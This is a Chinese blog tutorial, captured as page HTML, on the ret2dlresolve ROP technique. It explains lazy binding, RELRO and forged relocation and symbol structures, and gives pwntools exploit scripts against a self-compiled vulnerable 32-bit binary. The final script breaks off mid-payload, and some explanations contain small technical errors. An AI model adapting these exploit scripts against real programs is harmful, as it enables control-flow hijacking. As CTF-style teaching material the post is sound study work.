

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="清风">
  <meta name="keywords" content="">
  
    <meta name="description" content="ROP之ret2alsolveRELRO保护原理简介 由于 GOT和PLT以及延迟绑定的原因，在启用延迟绑定时，符号解析只发生在第一次使用的时候，该过程是通过PLT表进行的，解析完成后，相应的GOT条目会被修改为正确的函数地址。因此，在延迟绑定的情况下。.got.plt必须可写，这就给了攻击者篡改地址劫持程序的执行的可能。 RELRO（ReLocation Read-Only）机制的提出就是为了解">
<meta property="og:type" content="article">
<meta property="og:title" content="ROP之ret2alsolve">
<meta property="og:url" content="http://example.com/2024/04/23/ROP%E4%B9%8Bret2alsolve/index.html">
<meta property="og:site_name" content="清风不识字">
<meta property="og:description" content="ROP之ret2alsolveRELRO保护原理简介 由于 GOT和PLT以及延迟绑定的原因，在启用延迟绑定时，符号解析只发生在第一次使用的时候，该过程是通过PLT表进行的，解析完成后，相应的GOT条目会被修改为正确的函数地址。因此，在延迟绑定的情况下。.got.plt必须可写，这就给了攻击者篡改地址劫持程序的执行的可能。 RELRO（ReLocation Read-Only）机制的提出就是为了解">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/126.jpg">
<meta property="article:published_time" content="2024-04-23T12:23:45.000Z">
<meta property="article:modified_time" content="2024-10-09T02:24:31.806Z">
<meta property="article:author" content="清风">
<meta property="article:tag" content="原创">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/126.jpg">
  
  
  
  <title>ROP之ret2alsolve - 清风不识字</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/scrollAnimation.css">
<link rel="stylesheet" href="https://cdn.bootcdn.net/ajax/libs/lxgw-wenkai-screen-webfont/1.7.0/style.min.css">
<link rel="stylesheet" href="/css/cloudedGlass.css">
<link rel="stylesheet" href="/css/selection.css">
<link rel="stylesheet" href="/css/macBorder.css">
<link rel="stylesheet" href="https://jsd.cdn.zzko.cn/gh/EmoryHuang/BlogBeautify@1.1/scroll.css">
<link rel="stylesheet" href="https://jsd.cdn.zzko.cn/gh/EmoryHuang/BlogBeautify@1.1/gradient.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":"0JWcKtnJwUWPWRrrdTax0lya-gzGzoHsz","app_key":"Q6KrvNK2N7nNsewpWYVdjHuI","server_url":"https://0jwcktnj.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":true},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="清风不识字" type="application/atom+xml">
</head>


<body><!-- hexo injector body_begin start --><div id="web_bg"></div><!-- hexo injector body_begin end -->
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>清风不识字</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="ROP之ret2alsolve"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-04-23 20:23" pubdate>
          2024年4月23日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          22 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">ROP之ret2alsolve</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2024年10月9日 上午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="ROP之ret2alsolve"><a href="#ROP之ret2alsolve" class="headerlink" title="ROP之ret2alsolve"></a>ROP之ret2alsolve</h1><h3 id="RELRO保护原理"><a href="#RELRO保护原理" class="headerlink" title="RELRO保护原理"></a><strong>RELRO保护原理</strong></h3><p>简介<br> 由于 GOT和PLT以及延迟绑定的原因，在启用延迟绑定时，符号解析只发生在第一次使用的时候，该过程是通过PLT表进行的，解析完成后，相应的GOT条目会被修改为正确的函数地址。因此，在延迟绑定的情况下。.got.plt必须可写，这就给了攻击者篡改地址劫持程序的执行的可能。</p>
<p>RELRO（ReLocation Read-Only）机制的提出就是为了解决延迟绑定的安全问题，它最初于2004年由Redhat的工程师Jakub jelnek实现，他将符号重定位表设置为只读，或者在程序启动时就解析并绑定所有的动态符号，从而避免GOT上的地址被篡改。RELRO有两种形式：</p>
<p>partial PELRO：一些段（包括.dynamic,.got等）在初始化后会被标记为读。               </p>
<p>Full RELRO ：除了Partial RELRO，延迟绑定将被禁止，所有的导入符号将在开始时被解析，.got.plt段会被完全初始化为目标函数的最终地址，并被mprotect标记为只读，但其实.got.plt会被直接合并到.got，也就看不到这段了。另外link_map和_dl_runtime_reolve的地址也不会被装入。开启Full RELRO会对程序启动时的性能造成一定的影响，但也只有这样才能防止攻击者篡改GOT。</p>
<h3 id="延迟绑定技术"><a href="#延迟绑定技术" class="headerlink" title="延迟绑定技术"></a><strong>延迟绑定技术</strong></h3><p>在程序没有开启FULL RELRO的时候，程序第一次执行函数时会进行一次动态链接，将got表上函数地址重定位为libc上的函数地址，这个过程会通过_dl_runtime_resolve(link_map_obj, realoc_index)来实现</p>
<p><img src="/img/ret2alsolve/a.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>如图所示</p>
<p>这里有push eax，eax又是什么呢，是把ebp-0x18的值，而ebp-0x18实际上就是esp,而esp为0x10</p>
<p>所以这里实际上是push 0x10</p>
<p>然后继续步入就到了0x8049020</p>
<p><img src="/img/ret2alsolve/b.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="/img/ret2alsolve/c.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>就是PLT0的位置</p>
<p>而这个push 0x10(是什么后面会讲)由plt表提供,如图所示</p>
<p><img src="/img/ret2alsolve/d.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>这里压入了一个参数</p>
<p><img src="/img/ret2alsolve/e.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>实际上就是link_map_obj，然后开始执行_dl_runtime_resolve(link_map_obj,realoc_index)将libc地址写入got表，整个延迟绑定大概就是这样</p>
<p>其中 link_map_obj 参数的作用是为了能够定位 .dynamic 段，而定位了 .dynamic 段就能接着定位(根据偏移）到 .dynstr 段、.dynsym 段、.rel.plt 段，该参数是 PLT0 默认提供的，程序中所有函数在动态链接过程中的该参数都是相同的；</p>
<p>而realoc_index对应的其实就是类似与前面read函数要push 0x10,这个参数的作用是为了找到函数对应的ELF_REL结构体,这个参数由plt表提供</p>
<p><img src="/img/ret2alsolve/f.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>下面就是.rel.plt段，把read对应的0x80483a8减去.rel.plt开头地址0x8048398就是0x10,</p>
<p>所以realoc_index简单的理解就是对应函数的结构体到.rel.plt段的偏移(后面会详细讲.rel.plt段的构成，要结合着理解）</p>
<p><img src="/img/ret2alsolve/g.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>接下来我会介绍.dynamic段、.dynstr段、.dynsym段、.rel.plt段</p>
<p>每个段的寻找可以借助objump工具</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs stylus">objdump -s -j <span class="hljs-selector-class">.dynsym</span> pwn   <span class="hljs-comment">//pwn是可执行文件</span><br>objdump -s -j <span class="hljs-selector-class">.dynstr</span> pwn<br>objdump -s -j <span class="hljs-selector-class">.dynamic</span> pwn<br>objdump -s -j <span class="hljs-selector-class">.rel</span><span class="hljs-selector-class">.plt</span> pwn<br></code></pre></td></tr></table></figure>

<p>.dynamic段是用来存储动态链接程序的特定信息的，在这里我们不用特别里了解</p>
<h3 id="dynstr-段"><a href="#dynstr-段" class="headerlink" title=".dynstr 段"></a>.dynstr 段</h3><p>存放了各个函数的名称字符串。</p>
<p><img src="/img/ret2alsolve/h.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="dynsym-段"><a href="#dynsym-段" class="headerlink" title=".dynsym 段"></a>.dynsym 段</h3><p>由 Elf_Sym 结构体集合而成</p>
<p><img src="/img/ret2alsolve/i.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>其中的 Elf_Sym 结构体如代码</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-keyword">typedef</span> <span class="hljs-keyword">struct</span> &#123;<br>    ELF32_Word st_name;<br>    ELF32_Addr st_value;<br>    ELF32_Word st_size;<br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> st_info;<br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> st_other;<br>    Elf32_Section st_shndx;<br>&#125; Elf32_Sym;<br></code></pre></td></tr></table></figure>

<p>这里面唯一需要知道的就是st_name,这个对应的是这个结构体相对于.dynstr段的偏移，根据这个就可以找到.dynstr段的位置</p>
<h3 id="rel-plt-段"><a href="#rel-plt-段" class="headerlink" title=".rel.plt 段"></a>.rel.plt 段</h3><p>由 Elf_Rel 结构体集合而成</p>
<p><img src="/img/ret2alsolve/j.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>其中的 Elf_Rel 结构体如代码</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-keyword">typedef</span> <span class="hljs-keyword">struct</span> &#123;<br>    ELF32_Addr r_offset;<br>    ELF32_Addr r_info;<br>&#125; Elf32_Rel;<br></code></pre></td></tr></table></figure>

<p>其中r_offest对应的是函数在got表，r_info又移动8位后用来表示这个函数的标识符在.dynsym段的位置，例如，你运行的是read函数，那么r_info&lt;&lt;8就是read对应的结构体距离.dymsym段的位置</p>
<h3 id="联系"><a href="#联系" class="headerlink" title="联系"></a>联系</h3><p>这几段的关系是这样的，通过link_map_obj定位.dynamic段，在通过偏移定位到.rel.plt段，.dynstr段，.dynsym段，这里的偏移程序会给，不用我们操心，然后再通过realoc_index来确定.rel.plt段对应的函数结构体，从而找到对应函数的got表位置，再通过(r_info&lt;&lt;8)找到.dynsym段对应的该函数的ELF_Sym结构体，再通过st_name找到.dynstr段中对应函数的字符串，然后根据字符串到libc文件中找到对应的地址。如图所示</p>
<p><img src="/img/ret2alsolve/k.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>_dl_runtime_resolve 函数实际上就只是调用了 _dl_fixup 函数，其函数代码大致如下</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs cpp">_dl_fixup(<span class="hljs-keyword">struct</span> link_map *l,<span class="hljs-built_in">ElfW</span>(Word) reloc_arg)<br>&#123;<br>    <span class="hljs-comment">// 首先通过参数reloc_arg计算重定位的入口，这里的JMPREL即.rel.plt，reloc_offest即reloc_arg</span><br>    <span class="hljs-type">const</span> PLTREL *<span class="hljs-type">const</span> reloc = (<span class="hljs-type">const</span> <span class="hljs-type">void</span> *)(<span class="hljs-built_in">D_PTR</span>(l, l_info[DT_JMPREL]) + reloc_offset);<br>    <span class="hljs-comment">// 然后通过reloc-&gt;r_info找到.dynsym中对应的条目</span><br>    <span class="hljs-function"><span class="hljs-type">const</span> <span class="hljs-title">ElfW</span><span class="hljs-params">(Sym)</span> *sym </span>= &amp;symtab[<span class="hljs-built_in">ELFW</span>(R_SYM) (reloc-&gt;r_info)];<br>    <span class="hljs-comment">// 这里还会检查reloc-&gt;r_info的最低位是不是R_386_JMUP_SLOT=7</span><br>    <span class="hljs-built_in">assert</span>(<span class="hljs-built_in">ELF</span>(R_TYPE)(reloc-&gt;info) == ELF_MACHINE_JMP_SLOT);<br>    <span class="hljs-comment">// 接着通过strtab+sym-&gt;st_name找到符号表字符串，result为libc基地址</span><br>    result = _dl_lookup_symbol_x (strtab + sym -&gt;st_name, l, &amp;sym, l-&gt;l_scope, version, ELF_RTYPE_CLASS_PLT, flags, <span class="hljs-literal">NULL</span>);<br>    <span class="hljs-comment">// value为libc基址加上要解析函数的偏移地址，也即实际地址</span><br>    value = <span class="hljs-built_in">DL_FIXUP_MAKE_VALUE</span> (result, sym ? (<span class="hljs-built_in">LOOKUP_VALUE_ADDRESS</span>(result) + sym-&gt;st_value) : <span class="hljs-number">0</span>);<br>    <span class="hljs-comment">// 最后把value写入相应的GOT表条目中</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">elf_machine_fixup_plt</span> (l, result, reloc, rel_addr, value);    <br>&#125;<br></code></pre></td></tr></table></figure>

<p>这里唯一要注意的就是这个函数的运行会检查r_info的低位是否等于7。</p>
<h3 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h3><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;unistd.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;string.h&gt;</span></span><br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">vuln</span><span class="hljs-params">()</span></span>&#123;<br>    <span class="hljs-type">char</span> buf[<span class="hljs-number">0x10</span>];<br>    <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;&gt; &quot;</span>);<br>    <span class="hljs-built_in">read</span>(<span class="hljs-number">0</span>, buf, <span class="hljs-number">0x30</span>);<br>&#125;<br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">init</span><span class="hljs-params">()</span></span>&#123;<br>    <span class="hljs-built_in">setbuf</span>(stdout, <span class="hljs-number">0</span>);<br>    <span class="hljs-built_in">setbuf</span>(stderr, <span class="hljs-number">0</span>);<br>    <span class="hljs-built_in">setbuf</span>(stdin, <span class="hljs-number">0</span>);<br>&#125;<br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-built_in">init</span>();<br>    <span class="hljs-built_in">vuln</span>();<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>编译(自己编译出来的文件因libc版本不同，地址可能跟我有些差异)</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cpp">gcc -w -fno-stack-protector -z relro -no-pie -fno-pie <span class="hljs-number">1.</span>c -m32 -o pwn<br></code></pre></td></tr></table></figure>

<p>首先我们先用栈溢出来模拟puts函数的动态链接调用过程</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span>*<br>context.log_level=<span class="hljs-string">&#x27;debug&#x27;</span><br>io=process(<span class="hljs-string">&#x27;./ret21&#x27;</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./ret21&#x27;</span>)<br>leave=<span class="hljs-number">0x080491F2</span><br>ret=<span class="hljs-number">0x804900a</span><br>PLT0=<span class="hljs-number">0x8049020</span><br>buf=elf.bss()+<span class="hljs-number">0x800</span><br>rel_plt=<span class="hljs-number">0x8048398</span><br>dynsym=<span class="hljs-number">0x804821c</span><br>dynstr=<span class="hljs-number">0x80482bc</span><br><span class="hljs-comment">#gdb.attach(io,&#x27;b*vuln&#x27;)</span><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x18</span> + p32(buf) + p32(elf.sym[<span class="hljs-string">&#x27;read&#x27;</span>]) + p32(leave) + p32(<span class="hljs-number">0</span>) + p32(buf) + p32(<span class="hljs-number">0x100</span>)<br>io.sendafter(<span class="hljs-string">b&#x27;&gt; \n&#x27;</span>,payload)<br>sleep(<span class="hljs-number">3</span>)<br>payload2=<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">4</span>+p32(PLT0)+p32(<span class="hljs-number">0x18</span>)+p32(<span class="hljs-number">0</span>)+p32(buf-<span class="hljs-number">0x14</span>)+<span class="hljs-string">b&#x27;Haker&#x27;</span><br>io.send(payload2)<br>pause()<br></code></pre></td></tr></table></figure>

<p><img src="/img/ret2alsolve/l.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>在这个代码中，我们先进行了栈迁移，之后模拟已经将 0x18 (puts 函数的 realoc_index 参数）已经压入栈，接着执行 PLT0，压入 link_map_obj 参数，然后执行 _dl_runtime_resolve 函数，之后解析完成那么就能够接着执行 puts(“Hacker!”) 打印出 Hacker!</p>
<p>因为这个解析函数是依靠各个段中的对应函数结构体构成的，那么，我们是否可以通过伪造结构体来执行我们想要执行的函数，这就是今天的重点</p>
<p>ret2dlsolve的rop技术</p>
<p>接下来我会通过构造结构体来puts(‘Hacker!’）</p>
<h4 id="伪造-dynstr段上的字符串"><a href="#伪造-dynstr段上的字符串" class="headerlink" title="伪造.dynstr段上的字符串"></a>伪造.dynstr段上的字符串</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># set fake_st_name</span><br>fake_st_name = buf + xx - .dynstr //xx指的是栈上的栈上偏移<br>我们会在payload上构造字符串<br></code></pre></td></tr></table></figure>

<h4 id="构造ELF-Sym结构体"><a href="#构造ELF-Sym结构体" class="headerlink" title="构造ELF_Sym结构体"></a>构造ELF_Sym结构体</h4><p>前面可知，此结构体有6个参数，实际上只需要伪造st_name就可以了，其他的不变</p>
<p>所以</p>
<p><img src="/img/ret2alsolve/m.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#set fake_Elf_Sym</span><br>fake_Elf_Sym = p32(fake_st_name) + p32(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span> + p32(<span class="hljs-number">0x12</span>) + p32(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span><br></code></pre></td></tr></table></figure>

<h4 id="构造ELF-Rel结构体"><a href="#构造ELF-Rel结构体" class="headerlink" title="构造ELF_Rel结构体"></a>构造ELF_Rel结构体</h4><p>首先要解决的问题就是，realoc_index的问题，上面已经详细讲过，realoc_index实际上就是对应函数结构体到rel.plt段的偏移,由前面可知，此结构体有两个参数，一个是对应函数的got表，一个是r_info表示EFL_Sym结构体到.dynsym段的偏移，还有就是_dl_fixup 函数执行时会检查r_info的低位是否为7</p>
<p>所以</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">realoc_index=fake_ELF_REL-rel_plt<br>r_sym = <span class="hljs-built_in">int</span>((buf + xx - .dynsym)/<span class="hljs-number">0x10</span>)   //这里是为了去掉低位<br>r_info = (r_sym &lt;&lt; <span class="hljs-number">8</span>) + <span class="hljs-number">7</span>  //这里左移<span class="hljs-number">8</span>位后+<span class="hljs-number">7</span>是为了绕过判定再右移<span class="hljs-number">8</span>位后不会破坏地址<br></code></pre></td></tr></table></figure>

<p>最终的exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span>*<br>context.log_level=<span class="hljs-string">&#x27;debug&#x27;</span><br>io=process(<span class="hljs-string">&#x27;./ret21&#x27;</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./ret21&#x27;</span>)<br>leave=<span class="hljs-number">0x080491F2</span><br>ret=<span class="hljs-number">0x804900a</span><br>PLT0=<span class="hljs-number">0x8049020</span><br>buf=elf.bss()+<span class="hljs-number">0x800</span><br>rel_plt=<span class="hljs-number">0x8048398</span><br>dynsym=<span class="hljs-number">0x804821c</span><br>dynstr=<span class="hljs-number">0x80482bc</span><br><span class="hljs-comment">#gdb.attach(io,&#x27;b*vuln&#x27;)</span><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x18</span> + p32(buf) + p32(elf.sym[<span class="hljs-string">&#x27;read&#x27;</span>]) + p32(leave) + p32(<span class="hljs-number">0</span>) + p32(buf) + p32(<span class="hljs-number">0x100</span>)<br>io.sendafter(<span class="hljs-string">b&#x27;&gt; \n&#x27;</span>,payload)<br>sleep(<span class="hljs-number">3</span>)<br><span class="hljs-comment"># set fake_st_name</span><br>fake_st_name = buf + <span class="hljs-number">0x34</span> - dynstr<br><br><span class="hljs-comment"># set fake_Elf_Sym</span><br>r_sym = (buf + <span class="hljs-number">0x1c</span> - dynsym) / <span class="hljs-number">0x10</span> <br>r_type = <span class="hljs-number">7</span><br>r_info = (<span class="hljs-built_in">int</span>(r_sym) &lt;&lt; <span class="hljs-number">8</span>) + r_type   <span class="hljs-comment">#r_sym对应的是构造的sym在dynsym的偏移，在执行时应该会加上dynsym的地址</span><br>puts_str_addr = <span class="hljs-number">0x80482F3</span><br>fake_Elf_Sym = p32(fake_st_name) + p32(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span> + p32(<span class="hljs-number">0x12</span>) + p32(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span><br><br><span class="hljs-comment"># set fake_Elf_Rel</span><br>realoc_index = buf + <span class="hljs-number">0x14</span> - rel_plt <span class="hljs-comment">#plt表中的索引可能是rel_plt到对应结构体的偏移</span><br>fake_Elf_Rel = p32(elf.got[<span class="hljs-string">&#x27;read&#x27;</span>]) + p32(r_info) <span class="hljs-comment">#这里p32(elf.got[&#x27;read&#x27;])的作用是把在libc中的system实际地址写入read的got表处</span><br><br><br>payload = <span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">4</span> + p32(PLT0) + p32(realoc_index) + p32(<span class="hljs-number">0</span>) + p32(buf + <span class="hljs-number">0x3a</span>) //这里存在对齐问题，如果是p32(buf+<span class="hljs-number">0x3c</span>)的话只会打出<span 